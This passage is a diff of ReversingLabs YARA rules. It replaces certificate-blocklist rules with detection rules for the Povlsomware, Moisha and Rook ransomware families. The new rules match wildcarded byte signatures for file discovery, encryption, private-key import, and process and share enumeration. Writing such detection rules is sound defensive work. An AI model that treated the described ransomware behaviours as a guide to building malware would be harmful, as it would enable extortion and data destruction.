+            02 8E 2C ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 16 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 28 ??
+            ?? ?? ?? 2A 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 28 ?? ?? ?? ?? 2A
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $payload and ( $NSIS_CheckIntegrity or ( $UPX_Decompression and $UPX_Encrypting ) or $NSIS_ErrorPart or $dumping_functionv2014 or $dumping_functionMidVersion or ( $exception1 and $exception2 and $exceptionallock ) or $dumping_functionP or $dumping_functionE or $dumping_functionB or $dumping_function111 or $dumping_function2 or $lib_loader )
+		uint16( 0 ) == 0x5A4D and ( $change_boot ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_05E2E6A4Cd09Ea54D665B075Fe22A256 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Povlsomware : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Povlsomware ransomware."
 		author = "ReversingLabs"
-		id = "824c6b2f-081a-5f38-b949-d802f59e6ced"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "317d7cca-4fe8-55ab-8f5f-e42be727ec26"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L27-L43"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Povlsomware.yara#L1-L64"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "43da21d9c7ae9bfcc7fe4ee69f9d46cbce1954785d56c1d424b36deb8afe592e"
+		logic_hash = "465dc1b1d7e9eb3091f36efb51029cd3383d05ece054e814b18f379e58c7e457"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Povlsomware"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$setup_attack = {
+            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 2C ??
+            00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 80 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            0C 16 0D 2B ?? 08 09 9A 13 ?? 00 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 09 17 58 0D
+            09 08 8E 69 32 ?? 00 38 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 1A 6F ?? ?? ??
+            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ??
+            13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00
+            DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC
+            28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 2A
+        }
+		$find_files = {
+            02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0C 2B ??
+            08 6F ?? ?? ?? ?? 0D 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 00 08 6F ?? ?? ?? ?? 2D ??
+            DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? 00 DC 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 38 ??
+            ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 03 28 ?? ?? ?? ?? 00 00 00
+            DE ?? 26 00 00 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
+        }
+		$encrypt_files = {
+            00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 06 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 0B 07 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 00 02 02 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F ?? ?? ??
+            ?? 00 7E ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "*.google.com" and pe.signatures [ i ] . serial == "05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $setup_attack ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_77019A082385E4B73F569569C9F87Bb8 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Moisha : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Moisha ransomware."
 		author = "ReversingLabs"
-		id = "4046a31b-d7c8-5c63-b5b2-2179b0817b03"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c72f654f-955e-5ff6-ac91-19fbb858265c"
+		date = "2022-10-11"
+		modified = "2022-10-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L45-L61"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Moisha.yara#L1-L86"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8613986005bdd30d92e633fa2058be5c43f1c530b9dc6d80ec953f12f6d66ce7"
+		logic_hash = "89cefbbb8ec722216721bb43eb14cc33fcd4671585051359a06b62236cbf3a6c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Moisha"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            73 ?? ?? ?? ?? 0A 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 28
+            ?? ?? ?? ?? 2D ?? 06 08 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ??
+            ?? ?? ?? DC DE ?? 26 DE ?? 06 2A
+        }
+		$find_files_p2 = {
+            02 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 03 09 6F ?? ?? ?? ?? 04 2C ?? 04 09
+            6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 6F ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 03 04
+            28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
+            ?? ?? ?? DC 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 03 11 ?? 6F ?? ?? ?? ?? 04 2C ?? 04
+            11 ?? 6F ?? ?? ?? ?? 2A
+        }
+		$find_files_p3 = {
+            73 ?? ?? ?? ?? 0A 06 03 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 02 28
+            ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ??
+            ?? ?? ?? 2C ?? 06 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 31 ?? 06 7B ?? ?? ?? ?? 2C ?? 06 FE
+            06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 17 6F ?? ?? ?? ?? 07 17 6F ?? ?? ??
+            ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 09 6F ?? ?? ?? ?? 06 7B
+            ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28
+            ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 2A
+        }
+		$import_priv_key = {
+            02 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 16 13 ?? 16 13 ?? 16 13 ?? 11 ?? 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 11 ?? 20 ??
+            ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2E ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 28 ?? ?? ?? ?? 13
+            ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ??
+            0B 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0C 11 ?? 28 ?? ?? ?? ?? 13 ??
+            11 ?? 11 ?? 6F ?? ?? ?? ?? 0D 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13
+            ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13
+            ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ??
+            ?? 13 ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 06 7D ?? ?? ?? ?? 12 ?? 07 7D ?? ?? ?? ?? 12 ??
+            08 7D ?? ?? ?? ?? 12 ?? 09 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ??
+            ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 13 ?? DE ?? 11 ??
+            6F ?? ?? ?? ?? DC 11 ?? 2A
+        }
+		$encrypt_files = {
+            20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A 14 0B 14 0C 16 0D 20 ?? ?? ?? ?? 13 ?? 03 19 17 1D 28
+            ?? ?? ?? ?? 0B 03 19 18 1D 28 ?? ?? ?? ?? 0C 02 7B ?? ?? ?? ?? 08 17 6F ?? ?? ?? ?? 13
+            ?? 07 06 16 06 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 31 ?? 11 ?? 06 16 11 ?? 6F ?? ?? ??
+            ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 04 11 ?? 6F ?? ?? ?? ?? 04 6F ?? ?? ?? ??
+            13 ?? 11 ?? 8E 69 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 08 08 6F ?? ?? ?? ?? 16 6F ?? ?? ??
+            ?? 26 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08
+            6F ?? ?? ?? ?? 17 0D DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 13 ?? DE ?? 07 2C
+            ?? 07 6F ?? ?? ?? ?? 08 2C ?? 08 6F ?? ?? ?? ?? 09 26 DC 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AND LLC" and pe.signatures [ i ] . serial == "77:01:9a:08:23:85:e4:b7:3f:56:95:69:c9:f8:7b:b8" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $import_priv_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4F2Ef29Ca5F96E5777B82C62F34Fd3A6 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Rook : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Rook ransomware."
 		author = "ReversingLabs"
-		id = "6cfb6ae0-8eba-503b-8bb7-ac72746d9aa2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "60bbfd57-18bb-58b3-9abc-ab30943bbddd"
+		date = "2022-01-17"
+		modified = "2022-01-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L63-L79"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Rook.yara#L1-L122"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e8f27c4a72f416a16acabb1de606fdde7dc694256809fdb952a25313dda0d34e"
+		logic_hash = "dc8b37e55b634de52855dd851dbaaf3e690adfb2e875d0e0c9ef5f4846c6ff30"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Rook"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            48 2B D6 48 8D 4C 24 ?? 48 FF C2 41 B8 ?? ?? ?? ?? F6 D8 4D 1B FF 4C 23 FA 33 D2 E8
+            ?? ?? ?? ?? 45 33 C9 89 7C 24 ?? 4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CE FF 15
+            ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CE E8 ?? ?? ??
+            ?? 8B F8 48 83 FB ?? 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ??
+            48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F
+            5E 5D C3 49 8B 6E ?? 49 2B 2E 48 C1 FD ?? 80 7C 24 ?? ?? 75 ?? 8A 44 24 ?? 84 C0 74
+            ?? 3C ?? 75 ?? 40 38 7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D6 E8 ??
+            ?? ?? ?? 85 C0 75 ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06
+            49 8B 56 ?? 48 2B D0 48 C1 FA ?? 48 3B EA 0F 84 ?? ?? ?? ?? 48 2B D5 48 8D 0C E8 4C
+            8D 0D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+        }
+		$encrypt_files_p1 = {
+            40 55 53 56 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? 0F
+            B6 05 ?? ?? ?? ?? F2 0F 11 44 24 ?? 88 44 24 ?? E8 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ??
+            ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 CE ?? 48 8D 4C 24 ?? 89 35 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24
+            ?? FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0
+            0F 57 C9 F3 0F 7F 05 ?? ?? ?? ?? F3 0F 7F 0D ?? ?? ?? ?? F3 0F 7F 05 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 85 C0 48 89 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 0F 44 0D ?? ?? ??
+            ?? 48 89 0D ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C0 48 8D 15 ?? ??
+            ?? ?? 4C 63 C0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? 48 89 05 ?? ?? ?? ?? 33 DB 48 8B 05 ?? ?? ?? ?? 45 33 C9 48 89 05 ?? ?? ??
+            ?? 45 33 C0 48 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 C7
+        }
+		$encrypt_files_p2 = {
+            C1 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48
+            8D 85 ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D
+            25 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 45 33 C9 45 33 C0 4C 89 64 24 ?? 4C 89 BC 24
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8D 2D ?? ?? ?? ?? 83
+            F8 ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 89 5C 24 ??
+            E8 ?? ?? ?? ?? 85 C0 78 ?? 4C 63 C8 4C 8D 85 ?? ?? ?? ?? 48 8D 44 24 ?? 4D 2B C1 48
+            89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 89 64 24 ?? E8 ?? ?? ?? ??
+            49 8B CD FF 15 ?? ?? ?? ?? 44 8B C0 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ?? 41 F7 E8 C1 FA
+            ?? 8B CA C1 E9 ?? 03 D1 69 CA ?? ?? ?? ?? 44 3B C1 74 ?? FF C2 4C 8D 3D ?? ?? ?? ??
+            85 D2 0F 8E ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 49 8B DD 4C 89 B4 24 ?? ?? ?? ?? 49
+        }
+		$encrypt_files_p3 = {
+            8B FF 44 8B F2 0F 1F 00 48 8B 0D ?? ?? ?? ?? 8B 91 ?? ?? ?? ?? 85 D2 74 ?? 83 FA ??
+            75 ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7
+            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89
+            5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C7 ??
+            ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 49 83 EE ?? 75 ?? 4C 8B B4 24 ?? ?? ?? ?? 33 DB 48 8B
+            BC 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 FF C6 41 80 3C 34 ?? 75 ?? 48 8B 8D ?? ?? ??
+            ?? 48 8D 15 ?? ?? ?? ?? 89 74 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 4C 89 64 24 ?? FF 15
+            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 45 33 C0 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? EB ?? 48 8B 8D ?? ?? ?? ?? 48
+            8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 3D ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 45 33
+            C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 49 8B CC FF
+            15 ?? ?? ?? ?? 49 8B D4 48 8D 0D ?? ?? ?? ?? FF C0 4C 63 C0 E8 ?? ?? ?? ?? 48 8B 05
+            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ??
+            ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? 48 85 C0 74 ?? 48 8B 0D ?? ??
+            ?? ?? FF 50 ?? 48 8B 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 33 D2 44 8D 42 ?? FF D0 48
+            8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 63 85 ?? ?? ?? ?? 48 3D ??
+            ?? ?? ?? 73 ?? 0F 1F 00 48 63 85 ?? ?? ?? ?? 42 C6 04 28 ?? FF 85 ?? ?? ?? ?? 48 63
+            85 ?? ?? ?? ?? 48 3D ?? ?? ?? ?? 72 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
+            5E 5B 5D C3
+        }
+		$enum_procs = {
+            40 56 48 81 EC ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 48 8B C8 48 8B F0 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 89 9C
+            24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ??
+            0F 1F 40 ?? 0F 1F 84 00 ?? ?? ?? ?? 33 DB 48 8B FD 66 66 66 0F 1F 84 00 ?? ?? 00 00
+            48 8B 0F 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF C3 48 83 C7 ?? 83 FB ?? 72
+            ?? EB ?? 44 8B 44 24 ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? BA
+            ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48
+            8B CE FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ??
+            48 8B 9C 24 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5E C3
+        }
+		$enum_shares = {
+            48 83 EC ?? 33 D2 C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C
+            8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            48 89 5C 24 ?? 8B 5C 24 ?? 48 89 7C 24 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 0D ??
+            ?? ?? ?? 4C 8D 43 ?? BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 48 8B
+            4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 66 0F
+            1F 44 00 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ??
+            48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ?? 48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B
+            5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C7 48 8D 54 24 ?? FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 48 8B 0D ?? ?? ?? ?? 4C 8B C7 33 D2 FF 15 ?? ?? ?? ?? 48 8B 4C 24 ??
+            FF 15 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 5C 24 ?? 48 83 C4 ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bit9, Inc" and pe.signatures [ i ] . serial == "4f:2e:f2:9c:a5:f9:6e:57:77:b8:2c:62:f3:4f:d3:a6" and 1342051200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_shares ) and ( $enum_procs ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
